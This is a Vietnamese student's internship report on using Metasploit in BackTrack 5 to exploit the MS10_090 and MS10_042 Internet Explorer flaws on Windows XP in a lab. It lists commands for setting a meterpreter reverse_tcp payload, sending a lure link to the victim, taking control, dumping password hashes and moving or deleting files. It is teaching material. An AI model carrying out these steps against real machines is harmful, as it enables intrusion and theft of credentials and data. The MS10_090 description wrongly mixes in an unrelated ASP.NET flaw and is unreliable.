TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
Bao cao thuc tap tuan 2
1. BÁO CÁO THỰC TẬP TUẦN 2
(Từ ngày 20/5/2015-27/5/2015)
ĐỀ TÀI: SYSTEM HACKING
Giáo viên hướng dẫn: Thầy VÕ ĐỖ THẮNG
Sinh viên thực hiện: TRẦN ĐĂNG KHOA
2. MỤC LỤC
I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :.............................................1
1. Câu lệnhsử dụng để tấn công:...............................................................................................1
2. Câu lệnhsử dụng để điều khiển và khai thác dữ liệu:............................................................1
II. Khai thác các lỗ hổng bảo mật:..............................................................................................2
1. Lỗ hổng MS10_090:...............................................................................................................2
2. Lỗ hổng MS10_042:...............................................................................................................6
3. 1
I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :
1. Câu lệnh sử dụng để tấn công:
- #Username:root/password:toor : Thông tin đăng nhập
- #Startx : vào giao diện đồ họa
- #Dhclient –r : xóa thông số IP của máy
- #Dhclient eth0 : xin lại IP cho card eth0
- #Msfconsole : khởi động metasploit
- >Search xxx : tìm kiếm lỗ hổng xxx
- >Use x/y/z : sử dụng module , x/y/z là đường dẫn matching module
- >Show options : kiểm tra các thuộc tính của mã lỗi.
- >Set srvhost A : A là IP máy backtrack
- >Set lhost A
- >Set lport B : B là port muốn mở, B phải khác các port của hệ thống
- >Set payload windows/meterpreter/reverse_tcp
- >Exploit : tiêm mã độc.
- >Set filename abc : chỉnh tên file thành abc
- >sessions –i x : chiếm quyền điều khiển máy nạn nhân , x là id sessions
máy nạn nhân.
2. Câu lệnh sử dụng để điều khiển và khai thác dữ liệu:
- >getuid : xem thông tin hệ thống
- >sysinfo : xem thông tin hệ thống
- >upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ máy backtrack
qua ổ C máy nạn nhân
- >download C:/xyz.doc /root/Desktop : tải file xyz.doc từ máy nạn nhân
về máy backtrack
- >haskdump : lấy hashpass
- >shell : khám phá ổ đĩa máy nạn nhân
- >cd C: : chuyển dấu nhắc ổ đĩa
- >dir : liệt kê tài nguyên trong ổ C
- >md abc : tạo thư mục abc trong ổ C
- >rd abc : xóa thư mục abc trong ổ C
- >del abc.txt : xóa file abc.txt trong ổ C
- >exit : thoát.
4. 2
II. Khai thác các lỗ hổng bảo mật:
1. Lỗ hổng MS10_090:
a. Giới thiệu:
Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép kẻ tấn
công thực hiện mã lệnh thông qua Cascading Style Sheets (CSS)
Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng
dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra
khóa giải mã trong một thời gian ngắn.
b. Cách thức tấn công:
Bước 1: khởi động metasploit
5. 3
Bước 2: tìm kiếm module ms10_090
Bước 3: sử dụng module này
Bước 4: thiết lập các thuộc tính cần thiết
6. 4
Set các giá trị thuộc tính cần thiết
Bước 5: tiêm nhiễm
Bước 6: lấy quyền điều khiển và xem các thông tin trên winxp
Ta tiếnhành copy URL gửi qua cho máy nạn nhân. khi nạn nhân truy cập vào địa
chỉ này thì máy backtrack sẽ chiếm được quyền điều khiển của máy nạn nhân
7. 5
Ta nhận thấy giữa máy nạn nhân và máy attacker đã thiết lập một phiên làm việc có
ID là 1. Ta tiến hành thực thi quyền điều khiển trong sessionnày
Xem thông tinmáy xp:
Ngoài ra ta còn có thể toàn quyền thao tác trên máy nạn nhân như copy file, tải
file,…
8. 6
2. Lỗ hổng MS10_042:
a. Giới thiệu:
Lỗ hổng bảo mật trong “Help and Support Center” có thể cho phép thực
hiện mã lệnh từ xa (2229593)
Mã lỗi được thực thi khi người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết
thiết kế đặc biệt trong thông báo email.
b. Cách thức tấn công:
Bước 1: khởi động metasploit
9. 7
Bước 2: tìm kiếm module ms10_042
Bước 3: sử dụng module này
Bước 4: thiết lập các thuộc tính cần thiết
10. 8
Bước 5: tiêm nhiễm
Bước 6: lấy quyền điều khiển và xem các thông tin trên win xp
Gửi linkqua máy nạn nhân, khi nạn nhân truy cập vào địa chỉ trên bằng IE và mở
help center lên. Khi đó máy nạn nhân sẽ bị điều khiển.
11. 9
Chiếm quyền điều khiển máy nạn nhân, xem thông tinmáy nạn nhân
Ngoài ra ta còn có thể thực hiện toàn quyền trên máy nạn nhân.